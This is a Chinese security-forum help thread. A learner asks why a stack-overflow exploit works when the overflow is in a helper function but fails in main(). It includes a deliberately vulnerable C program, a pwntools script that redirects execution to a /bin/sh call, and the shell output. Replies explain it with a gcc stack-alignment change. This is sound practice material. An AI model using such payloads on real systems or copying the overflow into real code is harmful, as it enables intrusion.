首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 二进制漏洞
    3. 发新帖
[求助]栈溢出,main函数溢出失败,别的函数却能溢出成功.
发表于: 2018-5-21 22:35 4794

[求助]栈溢出,main函数溢出失败,别的函数却能溢出成功.

勿喋 活跃值
2018-5-21 22:35
4794
我又来问问题了..._(:з」∠)_

首先是一个成功的溢出实验,通过函数vul()来溢出.
源码:
#include <stdio.h>
void sys(){
    system("/bin/sh");
}

void vul(){
    char buf[128];
    read(0,&buf,512);
}

int main()
{
    vul();
    write(1,"hello\n",7);
    return 0;

}
主要思路是把函数vul()的返回地址覆盖为sys()函数的地址.
脚本:
from pwn import *
p=process('./test.out')
elf=ELF('./test.out')
sys_plt=elf.symbols['sys']
print hex(sys_plt)
payload='a'*128+'a'*8+'a'*4+p32(sys_plt)  //128字节的长度+8字节的对齐空间+4字节的ebp+sys()的地址
p.send(payload)
p.interactive()
实验结果:
neko@ubuntu:~/pwn$ python exp1.py 
[+] Starting local process './test.out': pid 56537
[*] '/home/neko/pwn/test.out'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
0x804846b
[*] Switching to interactive mode
$ id
uid=1000(neko) gid=1000(neko) groups=1000(neko),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$  
成功将vul()的地址覆盖为sys()的地址。

现在修改源代码为:
#include <stdio.h>
void sys(){
    system("/bin/sh");
}

int main()
{
    char buf[128];
    read(0,&buf,512);
    write(1,"hello\n",7);
    return 0;
}
思路和之前一样,只不过这次是把main函数的返回地址覆盖为函数sys()的地址.
ida中显示:
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [esp+0h] [ebp-88h]

  read(0, &buf, 0x200u);
  write(1, "hello\n", 7u);
  return 0;
}


脚本不变:
from pwn import *
p=process('./test.out')
elf=ELF('./test.out')
sys_plt=elf.symbols['sys']
print hex(sys_plt)
payload='a'*128+'a'*8+'a'*4+p32(sys_plt)
p.send(payload)
p.interactive()
但结果失败:
neko@ubuntu:~/pwn$ python exp1.py 
[+] Starting local process './test.out': pid 56593
[*] '/home/neko/pwn/test.out'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
0x804846b
[*] Switching to interactive mode
hello
\x00[*] Got EOF while reading in interactive
$ id
[*] Process './test.out' stopped with exit code -11 (SIGSEGV) (pid 56593)
[*] Got EOF while sending in interactive

这是什么原因?
------------------------------------分割线------------------------------------
gcc版本问题,使用小于5.0版本的gcc即可


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2018-5-22 21:09 被勿喋编辑 ,原因: 问题解决
收藏
免费 0
支持
分享
最新回复 (3)
idlefire
雪    币: 2
活跃值: (15)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
私信
2
我在kali上测试了下,也会出现不能直接pwn的情况,但是使用gdb调试之后,发现可能是由于系统问题或者是操作问题,main函数在“ret”之前会多出一条“lea esp,[ecx-0x4]”,不清楚你是什么情况了。。。
2018-7-26 23:06
0
返無歸一
雪    币: 60
活跃值: (304)
能力值: ( LV3,RANK:35 )
在线值:
发帖
回帖
粉丝
私信
3
idlefire 我在kali上测试了下,也会出现不能直接pwn的情况,但是使用gdb调试之后,发现可能是由于系统问题或者是操作问题,main函数在“ret”之前会多出一条“lea esp,[ecx-0x4]”,不清楚 ...
gcc 某版更新後編譯32bit會出現這條指令,如果單純想練習一下bof可以在編譯的時候加上-mpreferred-stack-boundary=2就不會出現這個了
2018-7-31 03:00
0
idlefire
雪    币: 2
活跃值: (15)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
私信
4
返無歸一 gcc 某版更新後編譯32bit會出現這條指令,如果單純想練習一下bof可以在編譯的時候加上-mpreferred-stack-boundary=2就不會出現這個了
这个选项貌似用来优化堆栈的,确实有用。
2018-8-6 18:14
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//